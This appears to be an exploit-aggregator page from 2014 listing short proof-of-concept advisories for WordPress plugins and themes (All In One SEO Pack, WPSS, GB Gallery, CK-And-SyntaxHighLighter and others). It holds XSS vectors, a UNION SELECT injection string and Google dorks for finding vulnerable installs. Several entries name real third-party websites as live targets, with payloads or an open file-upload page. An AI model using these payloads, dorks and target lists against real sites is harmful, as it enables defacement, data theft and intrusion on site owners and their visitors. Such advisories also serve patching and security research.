WordPress All In One SEO Pack 2.2.2 Cross Site Scripting

20 August 2014 - Source: http://www.mondounix.com
Author: 1N3
Website: http://xerosecurity.com
Vendor Website: https://wordpress.org/plugins/all-in-one-seo-pack/
Affected Product: All In One SEO Pack
Affected Version: 2.2.2
 
ABOUT:
 
All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google. Version 2.2.2 suffers from a cross site scripting (XSS) vulnerability in the “/wp-admin/post.php” page because it fails to properly sanitize the “aiosp_menulabel” form field. 
 
NOTE: User must have the ability to publish pages in the affected WordPress site.
 
POC:
 
http://localhost/wordpress/wp-admin/post.php?post_type=page
 
Host=localhost
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0)...


WordPress 2.77 CSRF

17 August 2014 - Source: http://www.mondounix.com
Disqus for Wordpress
https://wordpress.org/plugins/disqus-comment-system
Version affected: up to v2.77
 
CSRF allows for activation and deactivation of the plugin and syncing comments between Disqus servers and the WP database.
They supposedly just fixed the CSRF issues. Ugh. Sorry Nik. Even when you tell them about nonces they still don't get it right.
 
More details can be found here:
https://vexatioustendencies.com/csrf-in-disqus-wordpress-plugin-v2-77/


...


WordPress MyBand Theme Cross Site Scripting

15 August 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress MyBand Theme Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-03
  |
  | [*] Vendor Homepage : http://www.mybandtheme.com
  |
  | [*] Google Dork: inurl:wp-content/themes/myband
  |
  | [*] Tested on: Windows , Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind: XSS Reflected
  |
  | [*] PoC :
  |
  | [*]  [Localhost]/wordpress/wp-content/themes/myband/timthumb.php?src=[XSS]
  |-------------------------------------------------------------------------|
...


WordPress Gamespeed Theme Cross Site Scripting

15 August 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress Gamespeed Theme Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.dalih.net/
# Date: 3/8/2014
# Tested On : Linux , Windows
# Software Link : http://www.dalih.net/wordpress-themes/game-speed/
######################
#  
http://www.centrecatala.cl/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%22%3E%3Cimg%20src=aa%20onerror=prompt%28/xss/%29%3E
#  
http://radiohope.com.ar/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://www.gameactors.com/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://300mbfilms.ir/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
######################
#...


WordPress SI CAPTCHA Cross Site Scripting

15 August 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress SI CAPTCHA Anti-Spam Plugin Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-02
  |
  | [*] Vendor Homepage : http://wordpress.org
  |
  | [*] Software Link : http://wordpress.org/plugins/si-captcha-for-wordpress/
  |
  | [*] Version : 2.7.4
  |
  | [*] Google Dork: inurl:/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage
  |
  | [*] Tested on: Windows , Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind:...


WordPress GB Gallery Slideshow 1.5 SQL Injection

14 August 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress GB Gallery Slideshow 1.5 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://gb-plugins.com/
 
# Software Link : http://downloads.wordpress.org/plugin/gb-gallery-slideshow.1.5.zip
 
# Date : 2014-08-09
 
# Tested on : Linux / sqlmap 1.0-dev-5b2ded0
        Linux / Mozilla Firefox
 
######################
 
# Location : http://localhost/wp-content/plugins/gb-gallery-slideshow/GBgallery.php
 
######################
 
# Vulnerable code :
 
    if(isset($_POST['selected_group'])){
        global $gb_post_type, $gb_group_table, $wpdb;
        $my_group_id = $_POST['selected_group'];
    ...


WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

14 August 2014 - Source: http://www.mondounix.com
[+] Title: Wordpress ck-and-syntaxhighlighter Plugin RFU vulnerability
[+] Date: 2014-08-12
[+] Author: Hekt0r
[+] Tested on: Windows7 & Kali Linux
[+] Vendor Homepage: http://wordpress.org/
[+] Software Link: http://wordpress.org/plugins/ck-and-syntaxhighlighter/
[+] Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/
### POC:
http://localhost/wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
[+] File Uploaded:
http://localhost/wordpress/wp-content/uploads/ckfinder/files/file.txt
### Demo:
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://blog.itacm.cn/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
###...


WordPress WPSS 0.62 Cross Site Scripting

7 August 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress WPSS v 0.62 Plugin Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : 2014-08-05
  |
  | [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
  |
  | [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
  |
  | [*] Version : 0.62
  |
  | [*] Tested on: Windows , Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] PoC :
  |
  | [*]  [Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>
...


WordPress WPSS 0.62 SQL Injection

7 August 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress WPSS V 0.62 Plugin Sql injection
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : Date: 2014-08-05
  |
  | [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
  |
  | [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
  |
  | [*] Version : 0.62
  |
  | [*] Tested on: Windows , Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] PoC :
  |
  | [*]  [Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
...


WordPress WhyDoWork AdSense 1.2 XSS / CSRF

4 August 2014 - Source: http://www.mondounix.com
###########################################################################################
# Exploit Title: WhyDoWork AdSense Plugin 1.2 - XSS and CSRF
# Date: 28 July 2014
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage: https://wordpress.org/plugins/whydowork-adsense/
# Tested on: Win7 & Linux Mint
# Affected Version : 2.0.2 and earlier.
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
 
Affected items - Affected files.
 
http://localhost/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1[XSS CODE]
 
Proof of Concept (PoC):
Vector: "><svg/onload=alert(/Dylan/)>
 
Affected variable: $idx
Fix:...
